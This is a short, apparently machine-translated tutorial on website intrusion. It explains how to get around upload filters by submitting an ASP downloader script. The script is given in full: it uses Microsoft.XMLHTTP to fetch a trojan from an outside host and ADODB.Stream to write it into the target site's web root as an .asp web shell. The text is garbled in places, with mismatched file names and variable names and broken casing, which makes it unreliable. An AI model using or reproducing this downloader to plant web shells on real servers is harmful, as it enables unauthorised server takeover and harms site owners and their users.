In the process of website intrusion, sometimes when submitting our Trojan or other ASP files, it will be intercepted by the first-class information monitoring system because it sets a limit on the submission characters.
Since it does not allow us to submit, we can use the download method. This is like when we upload a large EXE file, the website prohibits upload, but we can use external download to download the target file to the local server. Well, this method is that as long as the server does not disable the XML and data stream components, we can submit the following ASP script file to the server.
<%
Set xPost = CreateObject ("Microsoft. XMLHTTP ")
XPost. Open "GET", "http://www.waitalone.cn/test.txt", False // the address of the Code on the Internet, that is, Dama
XPost. Send ()
Set sGet = CreateObject ("ADODB. Stream ")
SGet. Mode = 3
SGet. Type = 1
SGet. Open ()
SGet. Write (xPost. responseBody)
SGet. SaveToFile Server. MapPath ("test. asp"), 2 // file generated in the root directory
Set sGet = nothing
Set sPOST = nothing
Response. Write ("the object has been downloaded! ")
%>
Use the xmland data stream components of the server to download the contents of ak.txt of blogto the root directory of the target site and save it as ak. asp.
The content in ak.txt is of course the intercepted content. After accessing the submitted ASP Webpage file, there will be a blank space. Then we can access the ak. asp file, and the content to be uploaded has been saved successfully!